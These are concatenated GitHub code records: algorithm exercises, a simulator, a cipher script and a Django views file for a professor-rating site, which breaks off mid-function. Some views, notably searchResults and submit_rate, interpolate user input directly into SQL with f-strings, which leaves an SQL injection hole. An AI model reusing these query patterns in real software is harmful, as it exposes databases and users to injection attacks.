'/.bzr'):\n subprocess.check_call(['bzr', 'update'], cwd=IMPORT_DIR)\n else:\n subprocess.check_call(['bzr', 'checkout', 'lp:ubuntu-cve-tracker', '.'],\n cwd=IMPORT_DIR)\n\n our_issues = set(kernel_sec.issue.get_list())\n their_issues = dict(get_recent_issues())\n\n # Also look at any older issues that we already track\n for cve_id in our_issues:\n if cve_id not in their_issues:\n for state in ['active', 'ignored', 'retired']:\n their_filename = IMPORT_DIR + '/' + state + '/' + cve_id\n if os.path.exists(their_filename):\n their_issues[cve_id] = their_filename\n\n for cve_id in their_issues:\n their_filename = their_issues[cve_id]\n with open(their_filename, encoding='utf-8') as f:\n try:\n theirs = load_ubuntu_issue(f)\n except NonKernelIssue:\n continue\n except (KeyError, ValueError, UnicodeDecodeError):\n print('Failed to parse %s' % their_filename, file=sys.stderr)\n continue\n\n if cve_id not in our_issues:\n # Copy theirs\n ours = theirs\n else:\n # Merge into ours\n ours = kernel_sec.issue.load(cve_id)\n kernel_sec.issue.validate(ours) # check that it's good to start with\n if not kernel_sec.issue.merge_into(ours, theirs):\n continue\n\n try:\n kernel_sec.issue.validate(ours)\n except ValueError as e:\n print('%s: %s' % (their_filename, e), file=sys.stderr)\n continue\n\n kernel_sec.issue.save(cve_id, ours)\n\nif __name__ == '__main__':\n main()\n","repo_name":"rockyrays/cip-kernel-sec","sub_path":"scripts/import_ubuntu.py","file_name":"import_ubuntu.py","file_ext":"py","file_size_in_byte":10494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35206322891","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def delNodes(self, root: TreeNode, to_delete: List[int]) -> List[TreeNode]:\n \n results = []\n to_delete = set(to_delete)\n \n def backtrack(parent, node, deleted = False):\n # print(node.val, results)\n if not node: # None\n return\n print(node.val, deleted)\n \n if node.val in to_delete:\n if parent is not None:\n parent.left = None if node==parent.left else parent.left\n parent.right = None if node==parent.right else parent.right\n \n print(\"DEL\", node.val)\n print(\"left-d\")\n backtrack(node, node.left, True)\n print(\"right-d\")\n backtrack(node, node.right, True)\n return\n \n elif deleted:\n # print(node.val, node)\n results.append(node)\n print(\"NOT DEL\", node.val)\n print(\"left-nd\")\n backtrack(node, node.left)\n print(\"right-nd\")\n backtrack(node, node.right)\n \n backtrack(None, root, True)\n \n print(results)\n return results\n \n ","repo_name":"HYUcoolguy/algorithm-study","sub_path":"LeetCode/1110.py","file_name":"1110.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"34064100381","text":"from collections import deque\nimport sys\ninput = sys.stdin.readline\n\n\ndef bfs(board, ice, n, m):\n queue = deque([])\n visit = [[0]*m for _ in range(n)]\n dx = [-1, 1, 0, 0]\n dy = [0, 0, -1, 1]\n count = 0\n for ix, iy in ice:\n queue.clear()\n if board[ix][iy] > 0 and visit[ix][iy] == 0:\n start, end = ix, iy\n queue.append((start, end))\n count += 1\n visit[start][end] = count\n while queue:\n x, y = queue.popleft()\n for j in range(4):\n nx, ny = x + dx[j], y + dy[j]\n if not (0 <= nx < n) or not (0 <= ny < m):\n continue\n if board[nx][ny] > 0 and visit[nx][ny] == 0: # 방문했으면\n queue.append((nx, ny))\n visit[nx][ny] = visit[x][y]\n\n return count\n\n\nn, m = map(int, input().split())\nboard = [list(map(int, input().split())) for _ in range(n)]\nice = []\nfor i in range(n):\n for j in range(m):\n if board[i][j] != 0:\n ice.append((i, j))\n\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\nanswer = 0\n\nice_minus = [[0]*m for _ in range(n)]\n\nresult = bfs(board, ice, n, m) # 처음부터 두 덩어리 이상인 경우\nif result >= 2:\n print(0)\n exit()\n\ntime = 1\nwhile True:\n for ix, iy in ice:\n if board[ix][iy] == 0:\n continue\n for j in range(4):\n nx, ny = ix + dx[j], iy + dy[j]\n if 0 <= nx < n and 0 <= ny < m and board[nx][ny] <= 0:\n ice_minus[ix][iy] -= 1\n\n for i in range(n):\n for j in range(m):\n if ice_minus[i][j] == 0:\n continue\n tmp = ice_minus[i][j] + board[i][j]\n board[i][j] = 0 if tmp < 0 else tmp\n ice_minus[i][j] = 0\n\n for ix, iy in ice:\n if board[ix][iy] > 0: # 다 녹았다면\n break\n else:\n answer = 0\n break\n\n result = bfs(board, ice, n, m)\n if result >= 2:\n answer = time\n break\n time += 1\n\nprint(answer)\n","repo_name":"gaeunpark924/algorithm-study-python","sub_path":"2023/3월5주차/빙산.py","file_name":"빙산.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42018212429","text":"import Request\nimport Simulator\nimport numpy as np\n\nclass Resource:\n\n\tdef __init__(self, resource_id, simulator, boot_time, monitor, capacity=5):\n\t\tself.name = 'Resource_' + str(resource_id)\n\t\tself.simulator = simulator\n\t\tself.monitor = monitor\n\t\tself.capacity = capacity\n\t\tself.request_list = []\n\t\tself.available = self.capacity - len(self.request_list)\n\t\tself.boot_time = boot_time\n\t\tself.initialized = False\n\t\tself.start_time = 0\n\t\tprint('%3.4f, %s: Im booting up.' %(self.simulator.now, self.name))\n\n\tdef survey(self):\n\t\t# If the server is up and running\n\t\tif(self.initialized):\n\t\t\ttimeouts = [r.process_time for r in self.request_list]\n\t\t\tif(timeouts):\n\t\t\t\treturn min(timeouts)\n\t\t\telse:\n\t\t\t\treturn self.simulator.run_time\n\t\t# Still in boot-up\n\t\telse:\n\t\t\treturn self.boot_time\n\n\n\tdef arrival(self, request):\n\t\tself.request_list.append(request)\n\t\trequest.arrival_time = self.simulator.now\n\t\tself.update(1)\n\t\tprint('%3.4f, %s: I arrived to %s. %d slots available.' %(self.simulator.now, request.name, self.name, self.available))\n\n\tdef notify(self, time_step):\n\t\tif(self.initialized):\n\t\t\tfor r in self.request_list:\n\t\t\t\tr.process_time -= time_step\n\t\telse:\n\t\t\tself.boot_time -= time_step\n\n\tdef next_job(self):\n\t\tif(self.initialized):\n\t\t\ttimeouts = [r.process_time for r in self.request_list]\n\t\t\trequest_idx = np.argmin(timeouts)\n\t\t\trequest = self.request_list[request_idx]\n\t\t\tprint('%3.4f, %s: I\\'m leaving %s. %d slots available.' %(self.simulator.now, request.name, self.name, (self.available+1)))\n\t\t\tself.simulator.request_count += 1\n\t\t\trequest.departure_time = self.simulator.now\n\t\t\tself.monitor.observe_request(request)\n\t\t\tdel self.request_list[request_idx]\n\t\t\tself.update(-1)\n\t\telse:\n\t\t\tself.initialized = True\n\t\t\tself.start_time = self.simulator.now\n\t\t\tself.monitor.resource_init()\n\t\t\tprint('%3.4f, %s: Im ready to go.' %(self.simulator.now, self.name))\n\n\tdef update(self, change):\n\t\tself.available = self.capacity - len(self.request_list)\n\t\tif(len(self.request_list) - change == 0):\n\t\t\treturn\n\t\telse:\t\n\t\t\tfor r in self.request_list:\n\t\t\t\tcur_len = len(self.request_list) * 1.0\n\t\t\t\tprev_len = (len(self.request_list) - change) * 1.0\n\t\t\t\tnew_process_time = r.process_time * (cur_len / prev_len)\n\t\t\t\tr.process_time = new_process_time\n\n\tdef shutdown(self):\n\t\tself.monitor.resource_shut(self)","repo_name":"altugkarakurt/EnergyEfficientCapacityManagement","sub_path":"classes/Resource.py","file_name":"Resource.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10312344574","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.main, name=\"main\"),\n path('personal_cabinet/', views.personal_cabinet, name=\"personal_cabinet\"),\n path('change_profile/', views.change_profile, name=\"change_profile\"),\n path('create_site/', views.create_site, name=\"create_site\"),\n path('//', views.site_view, name=\"site_origin\"),\n path('//', views.site_view, name=\"site\"),\n path('register/', views.register_user, name=\"registration\"),\n path('login/', views.login_user, name=\"login\"),\n path('logout/', views.logout_view, name=\"logout\"),\n]","repo_name":"NackiE23/vpn-service","sub_path":"core/vpn_service/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28616169743","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def buildTree(self, preorder: List[int], inorder: List[int]) -> Optional[TreeNode]:\n val_to_index = {x:i for i,x in enumerate(inorder)}\n \n def construct(i1,i2,j1,j2):\n if i1 > i2 or j1 > j2:\n return None\n \n root = TreeNode(preorder[i1])\n mid = val_to_index[preorder[i1]] - val_to_index[inorder[j1]]\n root.left = construct(i1 + 1,i1+mid,j1,j1+mid-1)\n root.right = construct(i1+mid+1,i2,j1+mid+1,j2)\n return root\n \n return construct(0,len(preorder)-1,0,len(inorder)-1)\n","repo_name":"amanuel1271/Problem-Solving","sub_path":"105-construct-binary-tree-from-preorder-and-inorder-traversal/105-construct-binary-tree-from-preorder-and-inorder-traversal.py","file_name":"105-construct-binary-tree-from-preorder-and-inorder-traversal.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"28022860809","text":"#http://www.science.smith.edu/~nhowe/teaching/csc151/hw/hw1/\n#### using code from https://www.kite.com/python/docs/sys.stdout\nimport sys\nsys.stdout.write(\"Output\") \n####\n\n\ndef shiftLetter(letter, numshifts):\n asciilett = ord(letter) \n \n if (asciilett >= 65) and (asciilett <= 90): #for uppercase letters\n shiftedascii = (asciilett + numshifts) \n if (shiftedascii > 90): #incase the shifted values needs to wrap around the alphabet in encrypting\n x = shiftedascii - 90\n shiftedascii = x + 64\n if (shiftedascii < 65): #incase the shifted values needs to wrap around the alphabet in decrypting\n x = 65 - shiftedascii\n shiftedascii = 91 - x \n else:\n shiftedascii = shiftedascii \n return chr(shiftedascii)\n\n elif (asciilett >= 97) and (asciilett <= 122): #for lowercase letter\n shiftedascii = (asciilett + numshifts) \n if (shiftedascii > 122): #incase the shifted values needs to wrap around the alphabet in encrypting\n x = shiftedascii - 122\n shiftedascii = x + 96\n if (shiftedascii < 97): #incase the shifted values needs to wrap around the alphabet in decrypting\n x = 97 - shiftedascii\n shiftedascii = 123 - x \n else:\n shiftedascii = shiftedascii \n return chr(shiftedascii)\n else:\n return chr(asciilett) \n\n\ndef shiftMessage(message, padshifts):\n msglist = list(message) \n for i in range (0, len(msglist)):\n x = shiftLetter(msglist[i], padshifts[i]) #applies shiftLetter() for each character in the msglist\n x = str(x) \n msglist[i] = x #this replaces the list item with its shifted verison \n encry = \"\".join(msglist)\n return encry\n\n\n#returns the encrypted message using shifMessage() \ndef encipher(message):\n return shiftMessage(message, padshifts)\n\n\n#this negates each of the values in our padshifts list so that shiftMessage() can use it as an arguement to decrypt the message \ndef decipher(message):\n for i in range (0, len(padshifts)): \n padshifts[i] = padshifts[i] * -1 \n return shiftMessage(message, padshifts)\n\n\nmsg = ''' \"[C]ro eorcc hlhaz bb q dgumqr jldsl dt xdir ckbcuszao, wryw gg, yexnc mljdqtbbbe. Iwo biawc U udkbvl, tq N'o joubveszpm, phuqux pmze hpek vpdwfj. Kgxctr uxuh mmnt qzjo, wlt fn tcpj-nsfmgzhs.\" -- Txykv Jqjsvegy, \"rkr Oquvhy fy dki Ybuokwal,\" GHZM wbpvoh, mghhcceo vi Igpdhwpr-Ully Obwlpkcu (HIB), EZLXZ, xez PVWUEX, z yuquidlxqji afdcrbxi lor wvzakwll. [zhuid://afv.bi/2SjZpaY] '''\n\n#reads the pad file as a string to the variable 'pad'\nwith open('pad.txt', 'r') as file:\n pad = file.read()\n\n\n#creates the list 'padlist' with the number of shifts from each pad character\npadlist = list(pad)\npadshifts = [] \nfor s in padlist:\n num = ord(s)\n num = num - 65\n padshifts.append(num)\n\n\ndef mains(): \n #### using code from https://www.kite.com/python/docs/sys.stdout\n sys.stdout = open(\"deciphered.txt\", \"w\")\n\n encrypted = encipher(msg)\n print(\"Encrypted: \" + encrypted + \"\\n\")\n decrypted = decipher(encrypted)\n print(\"decrypted: \" + decrypted + \"\\n\")\n \n sys.stdout.close()\n ####\n\n\n\nif __name__ == \"__main__\":\n mains()\n\n\n\n\n","repo_name":"lesslyortiz/Caesar-Cipher-Project","sub_path":"cipher.py","file_name":"cipher.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42416940522","text":"from dataclasses import dataclass\n\nfrom ._base import ConfigTable\n\n\n@dataclass\nclass SangvisInAllyInstance:\n id: int # 1\n sangvis_id: int # 1001\n sangvis_level: int # 90\n life: int # 100\n sangvis_advance: int # 4\n sangvis_shape_n: int # 1\n sangvis_resolution_level: int # 3\n skill1: int # 8\n skill2: int # 1\n skill3: int # 5\n skill_advance: int # 0\n chip1: int # 1003\n chip2: int # 1001\n favor: int # 90000\n\n\nclass SangvisInAlly(ConfigTable):\n name = \"sangvis_in_ally\"\n\n def add_instance(self, k):\n return SangvisInAllyInstance(**self._data[k])\n","repo_name":"gf-data-tools/gf-utils","sub_path":"gf_utils/gamedata/table/sangvis_in_ally.py","file_name":"sangvis_in_ally.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"21754595821","text":"import re\nfrom django.shortcuts import render\nfrom scipy.fftpack import idct\nfrom .models import *\nfrom django.contrib.auth import logout, login, authenticate\nfrom django.contrib.auth.models import User\nfrom main.updating_scores import update_scores\nfrom django.db.models import Avg, Sum, Count\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.decorators import login_required\nfrom .decorators import *\nfrom django.conf import settings\nimport requests\nfrom django.contrib import messages\nfrom json import loads\nfrom django.http import JsonResponse\nfrom django.db.models import Q\nfrom django.views.decorators.http import require_http_methods\nfrom .db import DB_connect\nfrom django.core.mail import send_mail\nimport os\nfrom twilio.rest import Client\nfrom datetime import datetime\nfrom .classification import predict\n\n\ndef home(request):\n return render(request, './index.html')\n\n\ndef search(request):\n return redirect('home')\n\n\ndef labeled_reviews(request):\n db, cursor = DB_connect()\n\n cursor.execute(f'''\n SELECT count(*) as count\n FROM user_faculty_rev\n WHERE helpful = 0;\n ''')\n total = cursor.fetchone()\n\n cursor.execute(f'''\n SELECT review, employee_id, user_id, teaching_quality, difficulty_rating, overall_rating, student_thoughts\n FROM user_faculty_rev\n WHERE helpful = 0;\n ''')\n reviews = cursor.fetchall()\n\n context = {\n 'count': total['count'],\n 'reviews': reviews,\n }\n\n cursor.close()\n db.close()\n\n return render(request, 'labeled_reviews.html', context)\n\n@login_required(login_url='sign_in')\ndef rate(request, item, id):\n db, cursor = DB_connect()\n\n if item == 'instructor':\n cursor.execute(f'''\n SELECT fname, lname\n FROM Employee\n WHERE employee={id};\n ''')\n ins = cursor.fetchone()\n\n cursor.execute(f'''\n SELECT C.course, C.course_name\n FROM Employee E\n JOIN Department D\n ON E.department_id = D.department\n JOIN Course C\n ON C.course DIV 1000 = D.department\n WHERE employee={id};\n ''')\n courses = cursor.fetchall()\n\n context = {\n 'item': item,\n 'id': id,\n 'fname': ins['fname'],\n 'lname': ins['lname'],\n 'courses': courses\n }\n\n elif item == 'course':\n cursor.execute(f'''\n SELECT course_name\n FROM Course\n WHERE course={id};\n ''')\n course = cursor.fetchone()\n\n context = {\n 'item': item,\n 'id': id,\n 'course_name': course['course_name'],\n }\n\n elif item == 'dept':\n cursor.execute(f'''\n SELECT dept_name\n FROM Department\n WHERE department={id};\n ''')\n dept = cursor.fetchone()\n\n context = {\n 'item': item,\n 'id': id,\n 'dept_name': dept['dept_name'],\n }\n\n cursor.close()\n db.close()\n\n return render(request, 'rate.html', context)\n\n\n@login_required(login_url='sign_in')\ndef submit_rate(request, item, id):\n uname = request.user.username\n user = User.objects.get(username=uname)\n\n if request.method == 'POST':\n recaptcha_response = request.POST['g-recaptcha-response']\n data = {\n 'secret': settings.GOOGLE_RECAPTCHA_SECRET_KEY,\n 'response': recaptcha_response\n }\n verify = requests.post('https://www.google.com/recaptcha/api/siteverify', data=data)\n status = verify.json()\n\n if status['success']:\n if item == 'instructor':\n course_val = request.POST.get('course', '0')\n if str.isdigit(course_val):\n course_code = course_val\n try:\n course_instance = Course.objects.get(course=course_code)\n except:\n return render(request, './error.html')\n else:\n course_name = course_val\n try:\n course_instance = Course.objects.get(course_name=course_name)\n except:\n return render(request, './error.html')\n\n quality = request.POST['quality']\n difficulty = request.POST['difficulty']\n overall_rate = request.POST['rate']\n workload = request.POST.getlist('workload')\n personality = request.POST.getlist('personality')\n misc = request.POST.getlist('misc')\n comment = request.POST['comment']\n\n helpful = 1\n if comment != None and len(comment) != 0:\n helpful = predict(comment)\n\n try:\n em = Employee.objects.get(employee=id)\n u_rate = UserFacultyRev.objects.create(\n overall_rating=overall_rate, difficulty_rating=difficulty,\n student_thoughts=comment, helpful=helpful,\n teaching_quality=quality, course_id=course_instance.course,\n employee_id=em.employee, user_id=user.id\n )\n\n # Create records for workload, personality, and misc\n try:\n # insert each element\n for element in workload:\n FacultyWorkload.objects.create(employee=em, workload=element, user=user, review=u_rate)\n for element in personality:\n FacultyPersonality.objects.create(employee=em, personality=element, user=user,\n review=u_rate)\n for element in misc:\n FacultyMiscellaneous.objects.create(employee=em, miscellaneous=element, user=user,\n review=u_rate)\n except:\n print('Failed to insert tags')\n\n try:\n # after each rate\n # Updates the teaching quality, exams difficulty, and overall rating scores\n update_scores(id)\n # similar_professors()\n except:\n print('Could not update scores')\n except:\n print('Could not review')\n\n elif item == 'course':\n db, cursor = DB_connect()\n\n enjoyment = request.POST['enjoyment']\n effort = request.POST['effort']\n overall_rate = request.POST['rate']\n tags = request.POST.getlist('tag')\n comment = request.POST['comment']\n\n cursor.execute(f'''\n INSERT INTO user_course_rev(user_id, course_id, enjoyment_rating, effort_required, overall_rating, student_thoughts)\n VALUES({request.user.id}, {id}, {enjoyment}, {effort}, {overall_rate}, '{comment}');\n ''')\n\n cursor.execute(f'''\n SELECT LAST_INSERT_ID() as review;\n ''')\n review = cursor.fetchone()['review']\n\n for t in tags:\n cursor.execute(f'''\n INSERT INTO Course_tags(course_id, review_id, tag)\n VALUES({id}, {review}, '{t}');\n ''')\n\n cursor.close()\n db.close()\n\n elif item == 'dept':\n db, cursor = DB_connect()\n\n support = request.POST['support']\n act = request.POST['act']\n overall_rate = request.POST['rate']\n comment = request.POST['comment']\n\n cursor.execute(f'''\n INSERT INTO user_dept_rev(user_id, department_id, support_rating, activities_rating, overall_rating, student_thoughts)\n VALUES({request.user.id}, {id}, {support}, {act}, {overall_rate}, '{comment}');\n ''')\n\n cursor.close()\n db.close()\n\n context = {\n 'item': item,\n 'id': id,\n }\n\n return render(request, 'reviewSubmitted.html', context)\n\n\ndef course(request, id):\n db, cursor = DB_connect()\n\n cursor.execute(f'''\n SELECT C.course_name, D.dept_name, C.overall_rating\n FROM Course C\n JOIN Department D\n ON C.course DIV 1000 = D.department\n WHERE course={id};\n ''')\n course = cursor.fetchone()\n\n cursor.execute(f'''\n SELECT count(*) as rev_count, sum(overall_rating) as sum\n FROM user_course_rev\n WHERE course_id={id};\n ''')\n rev_count = cursor.fetchone()\n\n cursor.execute(f'''\n SELECT student_thoughts, enjoyment_rating, effort_required, upvotes, downvotes\n FROM user_course_rev\n WHERE course_id={id};\n ''')\n reviews = cursor.fetchall()\n\n context = {\n 'course': id,\n 'course_name': course['course_name'],\n 'dept_name': course['dept_name'],\n 'overall_rating': rev_count['sum'] / rev_count['rev_count'],\n 'rev_count': rev_count['rev_count'],\n 'reviews': reviews,\n }\n\n cursor.close()\n db.close()\n\n return render(request, 'course.html', context)\n\n\ndef dept(request, id):\n db, cursor = DB_connect()\n\n cursor.execute(f'''\n SELECT dept_name, overall_rating, admin_support, activities\n FROM Department\n WHERE department={id};\n ''')\n dept = cursor.fetchone()\n\n cursor.execute(f''' \n SELECT count(*) as rev_count, sum(overall_rating) as sum_overall, sum(activities_rating) as sum_activities, sum(support_rating) as sum_support\n FROM user_dept_rev\n WHERE department_id={id};\n ''')\n rev_count = cursor.fetchone()\n\n cursor.execute(f'''\n SELECT student_thoughts, upvotes, downvotes\n FROM user_dept_rev\n WHERE department_id={id};\n ''')\n reviews = cursor.fetchall()\n\n context = {\n 'department': id,\n 'dept_name': dept['dept_name'],\n 'overall_rating': rev_count['sum_overall'] / rev_count['rev_count'],\n 'admin_support': rev_count['sum_support'] / rev_count['rev_count'],\n 'activities': rev_count['sum_activities'] / rev_count['rev_count'],\n 'rev_count': rev_count['rev_count'],\n 'reviews': reviews,\n }\n\n cursor.close()\n db.close()\n\n return render(request, 'dept.html', context)\n\n\ndef test_comments(request):\n f = open('data.json', 'r')\n print(f)\n data = loads(f.read())\n f.close()\n\n result = {\n 'comm': data,\n }\n\n return render(request, './comm.html', result)\n\n\ndef test(request):\n profs = Employee.objects.all()\n return render(request, './index_old.html', {\"Profs\": profs})\n\n\ndef test2(request):\n q = request.POST.get('q')\n\n if q:\n results = Employee.objects.all()\n urls = {}\n\n for e in results:\n urls[e.employee] = '/professor/' + str(e.employee)\n\n return render(request, './search_results_htmx.html', {\"results\": results, \"urls\": urls})\n\n return render(request, './blank.html')\n\n\n# the function takes the query result and the cursor description of an executed query\n# converts from a tuple-like notation to dictionary-like notation\n# needed for each custom query executed\n# Not needed if django ORM is used\ndef convert_to_dictionary(cursor_description, query_result):\n total_count = 0\n returning_value = []\n for r in query_result:\n total_count += 1\n i = 0\n d = {}\n while i < len(cursor_description):\n d[cursor_description[i][0]] = r[i]\n i += 1\n returning_value.append(d)\n return returning_value, total_count\n\n\ndef Round(obj, decimal):\n for element in obj:\n tmp = element.overall_rating\n element.overall_rating = round(tmp, decimal)\n return obj\n\n\ndef Round_get(obj, dec):\n tmp = obj.overall_rating\n obj.overall_rating = round(tmp, dec)\n return obj\n\n\n@require_http_methods([\"POST\"])\ndef searchResults(request):\n db, cursor = DB_connect()\n\n # Provide fuzzy matching\n # Executed only once in order to add the indexes to the DB\n # cursor.execute('CREATE FULLTEXT INDEX name ON Employee(fname, lname) WITH PARSER NGRAM;')\n # cursor.execute('CREATE FULLTEXT INDEX cname ON Course(course_name) WITH PARSER NGRAM;')\n\n input = request.POST['input']\n\n cursor.execute(f'''\n SELECT E.employee, E.fname, E.lname, D.dept_name, ROUND(E.overall_rating, 2) as overall_rating\n FROM Employee E\n JOIN Department D\n ON E.department_id = D.department\n WHERE MATCH(fname, lname) AGAINST('{input}' IN NATURAL LANGUAGE MODE);\n ''')\n employee = cursor.fetchall()\n\n cursor.execute(f'''\n SELECT C.course, C.course_name, D.dept_name, ROUND(C.overall_rating, 2) as overall_rating\n FROM Course C\n JOIN Department D\n ON C.course DIV 1000 = D.department\n WHERE MATCH(course_name) AGAINST('{input}' IN NATURAL LANGUAGE MODE);\n ''')\n courses = cursor.fetchall()\n\n context = {\n 'employee': employee,\n 'courses': courses,\n 'next': request.POST['next'], # redirect to the rating form or to the reviews page\n }\n\n cursor.close()\n db.close()\n\n return render(request, './searchResults.html', context)\n\n\ndef professorTwo(request, prof_name):\n print(prof_name)\n name = prof_name.split(' ')\n first_name = name[0]\n second_name = name[1]\n query = Employee.objects.filter(fname=first_name, lname=second_name).get()\n print(query)\n return HttpResponse(status=200)\n\n\ndef professor(request, prof_id=None):\n # for all the custom queries executed!\n # cursors return the query result in the form of a tuple\n # needs to be converted to dictionary-like notation\n # that is what the loop does\n faculty_id = prof_id\n prof = Employee.objects.get(employee=faculty_id)\n prof = Round_get(prof, 2)\n em = Employee.objects.get(employee=faculty_id)\n overall_rating = em.overall_rating\n recommended_percentage = (overall_rating * 100) / 5\n recommended_percentage = round(recommended_percentage, 2)\n\n rev_count = UserFacultyRev.objects.filter(employee_id=prof).aggregate(Count('review'))\n rev_count = rev_count['review__count']\n\n sim_prof = []\n sim = em.similarfaculty_set.all()\n get_similar = []\n for i in range(0, len(sim)):\n get_similar.append(sim[i].similar_faculty)\n\n for ele in get_similar:\n sim_prof.append(Employee.objects.get(employee=ele))\n\n sim_prof = Round(sim_prof, 2)\n\n # get all revs\n reviews = UserFacultyRev.objects.filter(employee_id=faculty_id).order_by('-helpful', '-review')\n\n workload = FacultyWorkload.objects.filter(employee_id=prof).values('workload').distinct()\n misc = FacultyMiscellaneous.objects.filter(employee_id=prof).values('miscellaneous').distinct()\n personality = FacultyPersonality.objects.filter(employee_id=prof).values('personality').distinct()\n\n result = {\n 'prof': prof,\n 'similar_professors': sim_prof,\n 'revs': reviews,\n 'rev_count': rev_count,\n 'avg': recommended_percentage,\n 'workload': workload,\n 'misc': misc,\n 'personality': personality\n }\n return render(request, './professor.html', result)\n\n\n@login_required(login_url='sign_in')\ndef queue(request):\n # we need professor id and user id\n user_id = request.user.id\n user = User.objects.get(id=user_id)\n p = Employee.objects.filter(users=user)\n prof = Round(p, 2)\n\n result = {\n 'professors': prof\n }\n return render(request, './queue.html', result)\n\n\n@csrf_exempt\n@login_required(login_url='sign_in')\ndef add_to_queue(request):\n if request.method == 'POST':\n prof_id = request.POST.get('prof_id', None)\n faculty_id = prof_id\n uname = request.user.username\n user = User.objects.get(username=uname)\n try:\n e = Employee.objects.get(employee=faculty_id)\n emp = Employee.objects.filter(users=user)\n for element in emp:\n if element == e:\n return HttpResponse(status=400)\n except:\n print('Error here')\n user_id = user.id\n try:\n if prof_id is not None:\n user = User.objects.get(id=user_id)\n faculty = Employee.objects.get(employee=faculty_id)\n faculty.users.add(user)\n msg = f'Successfully Returning from adding prof to queue: {prof_id}'\n else:\n msg = \"prof_id is none\"\n except:\n print('Failed to insert')\n msg = f'Failed from adding prof to queue: {prof_id}'\n return HttpResponse(msg)\n return HttpResponse('Failed')\n\n\n@csrf_exempt\n@login_required(login_url='sign_in')\ndef remove_from_queue(request, prof_id=None):\n if prof_id is None:\n msg = 'Professor id is None: Fix the error'\n return HttpResponse(msg)\n print('Removing a professor from queue')\n # print(prof_id)\n faculty_id = prof_id\n uname = request.user.username\n # print(uname)\n user = User.objects.get(username=uname)\n user_id = user.id\n # print(f'{user_id} and {faculty_id}')\n try:\n db, cursor = DB_connect()\n\n deletion_query = \"DELETE FROM Employee_users WHERE user_id=%s AND employee_id=%s\"\n data = (user_id, faculty_id)\n cursor.execute(deletion_query, data)\n print('executed successfully')\n\n cursor.close()\n db.close()\n\n except:\n print('Error')\n return HttpResponse(status=200)\n\n\n@unauthenticated_user\ndef sign_in(request):\n if request.method == 'POST':\n recaptcha_response = request.POST['g-recaptcha-response']\n data = {\n 'secret': settings.GOOGLE_RECAPTCHA_SECRET_KEY,\n 'response': recaptcha_response\n }\n verify = requests.post('https://www.google.com/recaptcha/api/siteverify', data=data)\n status = verify.json()\n\n print(status)\n\n if status['success']:\n username = request.POST['username']\n passw = request.POST['password']\n\n # print(f'user email is {username} and the password is {passw}')\n user = authenticate(request, username=username, password=passw)\n\n if user is not None:\n # print('HEy HO')\n login(request, user, backend='django.contrib.auth.backends.ModelBackend')\n # print('Yo YO')\n return redirect('dashboard')\n else:\n return render(request, './signin.html')\n else:\n messages.error(request, 'Invalid reCAPTCHA. Please try again.')\n\n return render(request, './signin.html')\n\n@unauthenticated_user\ndef sign_up(request):\n if request.method == 'POST':\n print('Here')\n recaptcha_response = request.POST['g-recaptcha-response']\n data = {\n 'secret': settings.GOOGLE_RECAPTCHA_SECRET_KEY,\n 'response': recaptcha_response\n }\n verify = requests.post('https://www.google.com/recaptcha/api/siteverify', data=data)\n status = verify.json()\n\n print(status)\n\n if status['success']:\n print('Heree')\n fname = request.POST['fname']\n lname = request.POST['lname']\n username = request.POST['username']\n user_email = request.POST['email']\n passw = request.POST['password']\n major = request.POST['major']\n\n print(f'Record: {fname}, {lname}, {username}, {user_email}, {passw}, {major}')\n\n\n try:\n print('Here')\n User.objects.create_user(password=passw, username=username, first_name=fname, last_name=lname,\n email=user_email)\n print('Got here')\n return redirect('sign_in')\n except:\n return render(request, './error.html')\n else:\n messages.error(request, 'Invalid reCAPTCHA. Please try again.')\n return render(request, './signup.html')\n\n\ndef logoutUser(request):\n logout(request)\n return redirect('home')\n\n\n@login_required(login_url='sign_in')\ndef rate_course(request):\n return render(request, './rateCourse.html')\n\n\n@login_required(login_url='sign_in')\ndef dashboard(request):\n uname = request.user.username\n user = User.objects.get(username=uname)\n user_obj = User.objects.get(id=user.id)\n revs = UserFacultyRev.objects.filter(user_id=user_obj).distinct()\n rev_result = []\n for i in range(len(revs)):\n rev_result.append(Employee.objects.get(employee=revs[i].employee.employee))\n\n # print(user_obj)\n rev_result = Round(rev_result, 2)\n zipped_response = zip(rev_result, revs)\n content = {\n 'user': user_obj,\n 'revs': zipped_response\n }\n return render(request, './dashboard.html', content)\n\n\n@login_required(login_url='sign_in')\ndef like(request):\n if request.method == \"POST\":\n uname = request.user.username\n user = User.objects.get(username=uname)\n user_id = user.id\n print(f'UserID is {user_id}')\n rev_id = request.POST.get('rev_id', None)\n print(f'Rev id is {rev_id}')\n try:\n print('Here 1 - Check if user has already interacted with the button')\n try:\n get_rev = UserReactFaculty.objects.get(review_id=rev_id, user_id=user_id)\n if get_rev.downvote == 1:\n print('Here 2')\n UserReactFaculty.objects.filter(review_id=rev_id, user_id=user_id).update(downvote=0)\n UserReactFaculty.objects.filter(review_id=rev_id, user_id=user_id).update(upvote=1)\n rev = 